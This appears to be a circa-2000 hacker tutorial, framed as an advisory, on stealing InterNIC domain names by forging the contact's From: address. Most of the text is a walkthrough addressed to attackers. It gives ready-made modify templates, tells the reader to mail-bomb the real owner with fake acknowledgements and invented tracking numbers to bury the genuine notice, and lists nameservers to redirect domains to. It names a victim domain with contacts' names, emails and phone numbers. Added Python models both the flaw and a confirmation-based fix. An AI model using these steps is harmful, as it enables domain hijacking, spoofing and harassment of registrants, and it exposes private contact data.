::::::::: :::::::: ::::::::: ::::::::::
:+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ +:+
+#++:++#+ +#++:++#++ +#++:++#: :#::+::#
+#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+# #+#
######### ######## ### ### ###
http://old.bsrf.org.uk/tutorials/  http://www.bsrf.org.uk
Topic: A Flaw in InterNIC Authentication Scheme
HTML by: Martin L.
Written by: Lucifer Mirza
The technique below is a planned, step-by-step way of stealing com/net/org/gov/mil domain names registered through InterNIC (Network Solutions).
Tools: an anonymous remailer or mail bomber that lets you set the From: address (both are used below).
Instructions:
As the example for this advisory I will use the domain name wi2000.org. Go to networksolutions.com and click on the link that says 'Who Is.' Enter the domain name (wi2000.org in this case) in the search field and click on the 'Search' button. The WhoIs record is displayed as shown below:
Domain Name: WI2000.ORG
Administrative Contact:
MICKE, ANDERSSON (AMM367)
HACKEDINDUSTRIES@HOTMAIL.COM
545326-3445 (FAX) 545326-3445
Technical Contact, Zone Contact:
Jason, Berresford (BJE41)
jasonb@MOUNTAINCABLE.NET
1-(905)-765-5212
Billing Contact:
MICKE, ANDERSSON (AMM367)
HACKEDINDUSTRIES@HOTMAIL.COM
545326-3445 (FAX) 545326-3445
Record last updated on 22-Jan-2000.
Record created on 19-Dec-1999.
Database last updated on 3-Feb-2000 14:29:53 EST.
Domain servers in listed order:
NS1.CAN-HOST.COM 24.215.1.6
NS2.MOUNTAINCABLE.NET 24.215.0.12
Now you have two choices here:
-01> Take full control of the domain by changing the Administrative Contact's handle information.
OR
-02> Simply point the domain at another host and let it recover by itself in time.
The first approach is very aggressive and could be hazardous if you are going for gov or mil domain names, so I recommend the second approach for gov and mil domains.
____________________________
Initiating the First Attack:
----------------------------
Let me first explain the InterNIC authentication system, since most readers will not have their own domain names. Every contact and domain record carries an 'Auth Scheme'; with the common MAIL-FROM scheme a change request is authenticated by nothing more than the From: address of the e-mail that carries the template. The problem is that InterNIC does NOT send a confirmation e-mail when the request appears to come from the same address as the contact or the owner of the domain name itself, and SMTP does nothing to verify a From: header. Anyone can therefore forge the contact's e-mail address and change the information of any domain whose contact uses MAIL-FROM. A confirmation is still required from the address to which the contact is about to be transferred, but that shouldn't be too hard, as it is your own e-mail address ;-)
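To make the MAIL-FROM decision concrete, here is an added example (not code from the original advisory or from Network Solutions): a parser for the 'Na. Label....: value' lines used by both the Contact (v1.0) and Domain (v5.0) templates on this page, and a reconstruction of a registrar that, as described above, accepts a Modify request whenever the From: header equals the address on file for the handle. The contact table, the forged request, the HONEST_REQUEST variant and the domain-template fragment are constructed for the example; the registrar logic is a hypothetical model of the behaviour the advisory describes.

```python
"""MAIL-FROM authorisation as the advisory describes it (added example).

The template parser handles the 'Na. Label....: value' layout of the Contact
and Domain templates shown on this page.  The registrar decision is a
hypothetical reconstruction, not Network Solutions' code.
"""
import re
from email import message_from_string
from email.utils import parseaddr

# "1a. NIC Handle..............: AMM367"  ->  ("1a", "NIC Handle", "AMM367")
FIELD = re.compile(r"^\s*(\d+[a-z]?)\.\s*(.+?)\.*\s*:\s*(.*)$")


def parse_template(text):
    """Map field number -> (label, value) for every template line in text.
    Banner, heading and agreement lines do not start with a field number
    and are skipped."""
    fields = {}
    for line in text.splitlines():
        m = FIELD.match(line)
        if m:
            num, label, value = m.groups()
            fields[num] = (label.strip(), value.strip())
    return fields


# Contact addresses on file, taken from the WHOIS record above (constructed table).
CONTACTS_ON_FILE = {
    "AMM367": "HACKEDINDUSTRIES@HOTMAIL.COM",
    "BJE41": "jasonb@MOUNTAINCABLE.NET",
}


def mail_from_authorizes(raw_message, contacts_on_file=CONTACTS_ON_FILE):
    """Reconstruction of the MAIL-FROM check: a Modify request for handle 1a
    is accepted when the From: header equals the mailbox on file for it.
    SMTP never verifies From:, so both sides of the comparison are under the
    sender's control."""
    msg = message_from_string(raw_message)
    fields = parse_template(msg.get_payload())
    if fields.get("0b", ("", ""))[1].upper() != "MAIL-FROM":
        return False          # CRYPT-PW / PGP would be checked differently
    handle = fields.get("1a", ("", ""))[1]
    sender = parseaddr(msg.get("From", ""))[1].lower()
    return sender != "" and sender == contacts_on_file.get(handle, "").lower()


def confirmation_recipient(raw_message):
    """The only confirmation round-trip goes to the *new* mailbox in 1l,
    i.e. to whoever wrote the template."""
    return parse_template(message_from_string(raw_message).get_payload())["1l"][1]


def name_servers(raw_template):
    """For a Domain template, the delegation a Modify would install (7a/8a)."""
    f = parse_template(raw_template)
    return [f[k][1] for k in ("7a", "8a") if k in f and f[k][1]]


# Constructed request: the contact template from this page with a forged From:.
FORGED_REQUEST = """\
From: HACKEDINDUSTRIES@HOTMAIL.COM
To: hostmaster@networksolutions.com

Contact Version Number: 1.0
Authorization
0a. (N)ew (M)odify (D)elete.: Modify
0b. Auth Scheme.............: MAIL-FROM
0c. Auth Info...............:
Contact Information
1a. NIC Handle..............: AMM367
1b. (I)ndividual (R)ole.....: Individual
1c. Name....................: MICKE, ANDERSSON
1l. E-Mailbox...............: dd@doom.com
Authentication
3a. Auth Scheme.............: MAIL-FROM
3b. Auth Info...............: HACKEDINDUSTRIES@HOTMAIL.COM
"""

# Same body from an address that is not on file (constructed): the check fails.
HONEST_REQUEST = FORGED_REQUEST.replace(
    "From: HACKEDINDUSTRIES@HOTMAIL.COM", "From: someone@example.net", 1)

# Constructed Domain-template fragment (fields 7a/8a as on this page).
DOMAIN_FRAGMENT = """\
7a. Primary Server Hostname.........: NS1.CAN-HOST.COM
7b. Primary Server Netaddress.......: 24.215.1.6
8a. Secondary Server Hostname.......: NS2.MOUNTAINCABLE.NET
8b. Secondary Server Netaddress.....: 24.215.0.12
"""

if __name__ == "__main__":
    print("forged request accepted:", mail_from_authorizes(FORGED_REQUEST))
    print("confirmation sent to:", confirmation_recipient(FORGED_REQUEST))
    print("honest request accepted:", mail_from_authorizes(HONEST_REQUEST))
    print("delegation in domain template:", name_servers(DOMAIN_FRAGMENT))
```

The point the code makes is that `mail_from_authorizes` compares two strings the sender chose: the From: header and the handle in 1a. The only message that leaves the registrar for a second party goes to the address in 1l, which the same sender filled in.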
Here's the step-by-step procedure. First, the contact template that will be submitted (the E-Mailbox in 1l is changed to your own address):
******************* Please DO NOT REMOVE Version Number **********************
Contact Version Number: 1.0
**************** Please see attached detailed instructions *******************
Authorization
0a. (N)ew (M)odify (D)elete.: Modify
0b. Auth Scheme.............: MAIL-FROM
0c. Auth Info...............:
Contact Information
1a. NIC Handle..............: AMM367
1b. (I)ndividual (R)ole.....: Individual
1c. Name....................: MICKE, ANDERSSON
1d. Organization Name.......: WI2000
1e. Street Address..........: BLIXERED 1
1f. City....................: GOTEBORG
1g. State...................: LILLA EDET
1h. Postal Code.............: 46394
1i. Country.................: SE
1j. Phone Number............: 545326-3445
1k. Fax Number..............: 545326-3445
1l. E-Mailbox...............: dd@doom.com
Notify Information
2a. Notify Updates..........: AFTER-UPDATE
2b. Notify Use..............: AFTER-USE
Authentication
3a. Auth Scheme.............: MAIL-FROM
3b. Auth Info...............: HACKEDINDUSTRIES@HOTMAIL.COM
3c. Public (Y/N)............: NO
The automatic acknowledgement InterNIC sends back to the From: address looks like this:
Subject: [NIC-000128.4r50] Your Mail
This is an automatic reply to acknowledge that your message has been
received by hostmaster@networksolutions.com. This acknowledgement is "NOT" a
confirmation that your request has been processed. You will be notified when it
has been completed.
If you should have need to correspond with us regarding this request, please include the tracking number [NIC-000128.4r50] in the subject. The easiest way to do this is simply to reply to this message.
If you have not already done so, please come and visit our site via www browser or ftp and pick up the latest domain template or review the Domain Name Registration Service Agreement at the URLs:
Domain Name Registration Service Agreement: http://www.networksolutions.com/legal/service-agreement.html
Domain Name Registration Template: ftp://www.networksolutions.com/templates/domain-template.txt
Regards,
Network Solutions Registration Services
***********************************************
IMPORTANT INFORMATION
***********************************************
On January 15, 2000, Network Solutions introduced Service Agreement, Version 6.0. All versions of the Service Agreement template will continue to be accepted and processed until January 31, 2000. On and after February 1, 2000, please use the Network Solutions Service Agreement, Version 6.0 template located at ftp://www.networksolutions.com/templates/domain-template.txt for all template requests.
The terms and conditions of the Service Agreement are available on our Web
site at http://www.networksolutions.com/legal/service-agreement.html.
************************************************
The zone files, which make the Internet work, are normally updated twice daily, 7 days a week at 5:00 AM and 5:00 PM U.S. Eastern Standard Time. Requests that are completed before these times will be included in that 12-hour zone file update and will normally begin to take effect within 5-6 hours.
Should you wish to modify or delete an existing domain name registration, you can do so online, using our Service Agreement. You can change the registrant’s address, replace a contact/agent with a different contact/agent, or change primary and/or secondary name server information.
To update information about an existing contact, such as postal address, e-mail address or telephone number, complete and submit the Contact Form to hostmaster@internic.net. This form is available on our Web site at http://www.networksolutions.com/
To register or update information about a name server, complete and submit the Host Form to hostmaster@internic.net. This form is also available on our Web site.
Network Solutions Registration Services e-mail: help@networksolutions.com
_______________________________________________________________________
You should now be thinking that this acknowledgement could get you into trouble: it goes to the address you forged, so the real contact sees a tracking number for a change he never requested. There is a way of getting rid of this trouble. Use your mail bomber to send him 20-30 look-alike messages if you want your attack to succeed. Faced with 30-odd messages from the same address he will most likely delete all of them, and you are probably safe; if he 'does' e-mail someone, he will probably quote the wrong tracking number. In the case above the genuine tracking number is [NIC-000128.4r50]. OK, here is the harder part: open Notepad and make up similar-looking numbers yourself. NEVER bomb the person with the same tracking number twice. What I mean is that you should never send more than one e-mail with [NIC-000128.4r50]; in the next e-mail change [NIC-000128.4r50] to [NIC-000127.5089] or something else different. Here is a list of numbers I generated, just to give you a good idea of how the scheme works:
[NIC-000127.5089]
[NIC-000128.4rg7]
[NIC-000128.523f]
[NIC-000127.53d0]
[NIC-000129.r609]
[NIC-000128.3f6y]
[NIC-000128.5d8t]
[NIC-000127.r509]
[NIC-000128.4r30]
[NIC-000127.d307]
NOTE: Remember to change the number in both places, in the Subject as well as in the e-mail body!
In the case of wi2000.org you will send these e-mail messages to HACKEDINDUSTRIES@HOTMAIL.COM from hostmaster@internic.net (note that the genuine acknowledgement shown above came from hostmaster@networksolutions.com). The message subject and body are the ones described above.
Stop after you have mailed him/her 10-15 messages! Now it's time to e-mail hostmaster@networksolutions.com with the forged sender HACKEDINDUSTRIES@HOTMAIL.COM. So again, in this case the message is sent to hostmaster@networksolutions.com from HACKEDINDUSTRIES@HOTMAIL.COM with the template we created above:
______________________________________________________________________________
******************* Please DO NOT REMOVE Version Number **********************
Contact Version Number: 1.0
**************** Please see attached detailed instructions *******************
Authorization
0a. (N)ew (M)odify (D)elete.: Modify
0b. Auth Scheme.............: MAIL-FROM
0c. Auth Info...............:
Contact Information
1a. NIC Handle..............: AMM367
1b. (I)ndividual (R)ole.....: Individual
1c. Name....................: MICKE, ANDERSSON
1d. Organization Name.......: WI2000
1e. Street Address..........: BLIXERED 1
1f. City....................: GOTEBORG
1g. State...................: LILLA EDET
1h. Postal Code.............: 46394
1i. Country.................: SE
1j. Phone Number............: 545326-3445
1k. Fax Number..............: 545326-3445
1l. E-Mailbox...............: dd@doom.com
Notify Information
2a. Notify Updates..........: AFTER-UPDATE
2b. Notify Use..............: AFTER-USE
Authentication
3a. Auth Scheme.............: MAIL-FROM
3b. Auth Info...............: HACKEDINDUSTRIES@HOTMAIL.COM
3c. Public (Y/N)............: NO
________________________________________________________________________________
_____
NOTE: Do NOT put anything in the Subject!
-----
Just send one e-mail! Do NOT bomb hostmaster@networksolutions.com with more than one message! That's pretty much it. Now continue to bomb HACKEDINDUSTRIES@HOTMAIL.COM, changing the tracking number every time, until your 30-35 tracking numbers are used up!
Now all you have to do is WAIT. After 24 hours you can go and change the domain information and no one will be there to stop you, because the contact record's E-Mailbox now points at your own address: you are the admin of the domain name!
_____
NOTE: This attack will only work on domains that have an admin contact different from their technical contact!
-----
____________________________
Initiating the Second Attack:
----------------------------
This attack can succeed even if the technical and admin contacts are the same, but then the admin contact needs to be rather careless to disregard e-mails from InterNIC, since he is also the technical contact; but this method should work, as it has worked for me.
The procedure is basically the same, apart from the fact that this time:
- Go to http://www.networksolutions.com/
- Click on the link that says 'Make Changes.'
- Enter the domain name wi2000.org
- You should be presented with 2 blue buttons
- Click on the one that says *Expert*
- The next screen has the heading 'Select the form that meets your needs'
- Click on the link that says 'Service Agreement.'
- When it asks for an e-mail address, enter your own.
- Now you should see many fields, don't panic!
- Go to the technical contact and change the handle to the Freeservers, Hypermart, etc. handle (listed under 'Nameservers and Handles' below).
- Now come to 'Nameserver Information.'
- Change the nameservers to the Hypermart or Freeservers nameservers.
- If there is anything in the 'Optional Information' after that, simply delete it.
- Click on the button 'Submit this form for processing.'
- You are done; the form will be e-mailed to your e-mail address.
- When the form arrives in your e-mail, simply take this part:
___________________________________________________________________________________
**** PLEASE DO NOT REMOVE Version Number or any of the information below
     when submitting this template to hostmaster@networksolutions.com. *****
Domain Version Number: 5.0
********* Email completed agreement to hostmaster@networksolutions.com *********
AGREEMENT TO BE BOUND. By applying for a Network Solutions' service(s)
through our online application process or by applying for and registering a
domain name as part of our e-mail template application process or by using
the service(s) provided by Network Solutions under the Service Agreement,
Version 5.0, you acknowledge that you have read and agree to be bound by all
terms and conditions of this Agreement and any pertinent rules or policies
that are or may be published by Network Solutions.
Please find the Network Solutions Service Agreement, Version 5.0 located at
the URL http://www.networksolutions.com/legal/service-agreement.html.
[ URL ftp://www.networksolutions.com ]
[11/99]
Authorization
0a. (N)ew (M)odify (D)elete.........: M
0b. Auth Scheme.....................: MAIL-FROM
0c. Auth Info.......................:
Name Registration
1.  Comments........................:
2.  Complete Domain Name............: wi2000.org
Organization Using Domain Name
3a. Organization Name...............: WI2000
3b. Street Address..................: Blixered 1
3c. City............................: Goteborg
3d. State...........................: Lila Edet
3e. Postal Code.....................: 46394
3f. Country.........................: SE
Administrative Contact
4a. NIC Handle (if known)...........: AMM367
4b. (I)ndividual (R)ole?............: Individual
4c. Name (Last, First)..............:
4d. Organization Name...............:
4e. Street Address..................:
4f. City............................:
4g. State...........................:
4h. Postal Code.....................:
4i. Country.........................:
4j. Phone Number....................:
4k. Fax Number......................:
4l. E-Mailbox.......................:
Technical Contact
5a. NIC Handle (if known)...........: BJE41
5b. (I)ndividual (R)ole?............: Individual
5c. Name (Last, First)..............:
5d. Organization Name...............:
5e. Street Address..................:
5f. City............................:
5g. State...........................:
5h. Postal Code.....................:
5i. Country.........................:
5j. Phone Number....................:
5k. Fax Number......................:
5l. E-Mailbox.......................:
Billing Contact
6a. NIC Handle (if known)...........: AMM367
6b. (I)ndividual (R)ole?............: Individual
6c. Name (Last, First)..............:
6d. Organization Name...............:
6e. Street Address..................:
6f. City............................:
6g. State...........................:
6h. Postal Code.....................:
6i. Country.........................:
6j. Phone Number....................:
6k. Fax Number......................:
6l. E-Mailbox.......................:
Prime Name Server
7a. Primary Server Hostname.........: NS1.CAN-HOST.COM
7b. Primary Server Netaddress.......: 24.215.1.6
Secondary Name Server(s)
8a. Secondary Server Hostname.......: NS2.MOUNTAINCABLE.NET
8b. Secondary Server Netaddress.....: 24.215.0.12
END OF AGREEMENT
For instructions, please refer to:
"http://www.networksolutions.com/help/inst-mod.html"
____________________________________________________________________________________
- Now launch your anonymous remailer or mail bomber.
- From: the domain admin (HACKEDINDUSTRIES@HOTMAIL.COM in this case).
- To: hostmaster@networksolutions.com
- Subject: (do not enter any subject, leave the field blank!)
- Body: the template you created above.
- You are ready to go, but before you send this e-mail to InterNIC, remember to bomb HACKEDINDUSTRIES@HOTMAIL.COM with similar e-mails but different tracking numbers, as we did in the first procedure.
- After sending 10-20 e-mails, send the above template to InterNIC.
- Continue bombing with your 40 messages. Remember to generate 40-50 tracking numbers.
- This is basically it.
- The domain will be transferred to Freeservers or Hypermart, and from there you can simply activate it on your own e-mail address. Remember to use a fake e-mail.
________________________
Nameservers and Handles:
------------------------
Freeservers Technical Handle: FS4394
Primary Nameserver: NS3.FREESERVERS.COM
Primary Nameserver IP Address: 209.210.67.153
Secondary Nameserver: NS4.FREESERVERS.COM
Secondary Nameserver IP Address: 209.210.67.154
Hypermart Technical Handle: DA3706-ORG
Primary Nameserver: NS1.HYPERMART.NET
Primary Nameserver IP Address: 206.253.222.65
Secondary Nameserver: NS2.HYPERMART.NET
Secondary Nameserver IP Address: 206.253.222.66
_______________
Possible Fixes:
---------------
As you have seen, InterNIC does not use its tracking-number system effectively: the acknowledgement carries a tracking number, but nothing ties that number to an action the contact has to take, so a flood of forged acknowledgements with made-up numbers simply drowns the real one. The fix is a confirmation e-mail to the admin contact 'with' a tracking number: NOT the e-mail saying 'Your request is being processed', but a confirmation that asks 'Do you agree with this request?' and holds the change until the contact answers, even if the request was sent from the same e-mail address as the admin's. Such a confirmation must go to the address already on file, never to the From: address of the request, and the token it carries must be unguessable, because tracking numbers as issued today can easily be imitated. The stronger CRYPT-PW and PGP schemes that the same template field 0b 'Auth Scheme' accepts bind a request to a secret rather than to a forgeable header and are not affected by this flaw. As things stand, the attacks I have described above aren't too hard for a script kiddie with a canned bomber.
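The confirmation scheme asked for above, as an added example: a hypothetical reconstruction of a registrar that mails an unguessable per-request token to the mailbox already on file and applies the change only when that token comes back. This is not Network Solutions' code; the tracking-id and token formats, the Registrar class, the contact table, the guessed tracking numbers and the replacement mailbox micke@example.org are all constructed for the example.

```python
"""Confirmation-based change authorisation (added example).

A hypothetical reconstruction of the fix the advisory asks for, not Network
Solutions' code: a Modify request is held until the mailbox already on file
sends back an unguessable per-request token.  The From: header of the request
plays no part in the decision.  Tracking-id and token formats are invented.
"""
import hmac
import secrets
from dataclasses import dataclass


@dataclass
class PendingChange:
    handle: str
    new_mailbox: str
    token: str            # mailed only to the address on file


class Registrar:
    def __init__(self, contacts_on_file):
        self.contacts = dict(contacts_on_file)   # handle -> mailbox on file
        self.pending = {}                        # tracking id -> PendingChange
        self.outbox = []                         # (recipient, tracking id, token)

    def submit_modify(self, handle, new_mailbox, claimed_from):
        """Anyone may file a request; claimed_from is recorded but never
        trusted.  The challenge goes to the mailbox on file, and only the
        tracking id (which the advisory shows is easy to imitate) is returned
        to the submitter."""
        on_file = self.contacts[handle]
        tracking = "NIC-" + secrets.token_hex(4)       # hypothetical format
        token = secrets.token_urlsafe(16)              # 128 bits, unguessable
        self.pending[tracking] = PendingChange(handle, new_mailbox, token)
        self.outbox.append((on_file, tracking, token))
        return tracking

    def confirm(self, tracking, token):
        """Apply the change only when the exact token for that tracking id is
        returned.  hmac.compare_digest avoids leaking the token byte by byte
        through response timing.  An unanswered challenge leaves the record
        unchanged, so burying the mail under look-alike copies gains nothing."""
        change = self.pending.get(tracking)
        if change is None or not hmac.compare_digest(change.token, token):
            return False
        del self.pending[tracking]
        self.contacts[change.handle] = change.new_mailbox
        return True


# Constructed data: the wi2000.org admin contact from this page.
ON_FILE = {"AMM367": "HACKEDINDUSTRIES@HOTMAIL.COM"}


def replay_first_attack():
    """Run the advisory's first attack against this scheme.  Returns
    (where the challenge went, whether any attacker guess was accepted,
    the mailbox on file afterwards)."""
    reg = Registrar(ON_FILE)
    tracking = reg.submit_modify("AMM367", "dd@doom.com",
                                 claimed_from="HACKEDINDUSTRIES@HOTMAIL.COM")
    challenge_to = reg.outbox[-1][0]
    # The attacker knows the tracking id but not the token; the made-up
    # numbers from the advisory stand in for guesses (constructed list).
    guesses = ["NIC-000127.5089", "NIC-000128.4rg7", "NIC-000128.523f", tracking]
    accepted = any(reg.confirm(tracking, g) for g in guesses)
    return challenge_to, accepted, reg.contacts["AMM367"]


def legitimate_change():
    """The real contact reads the challenge and echoes the token back; a
    second use of the same token is refused."""
    reg = Registrar(ON_FILE)
    tid = reg.submit_modify("AMM367", "micke@example.org",
                            claimed_from="HACKEDINDUSTRIES@HOTMAIL.COM")
    recipient, tracking, token = reg.outbox[-1]
    ok = reg.confirm(tracking, token)
    return ok, reg.contacts["AMM367"], reg.confirm(tracking, token)


if __name__ == "__main__":
    print("attack:", replay_first_attack())
    print("legitimate:", legitimate_change())
```

The design point is that the decision never reads the From: header: the request only creates a pending entry, the secret travels to the contact the registrar already knows, and nothing changes until that secret is presented. A forged request therefore does no more than alert the real contact.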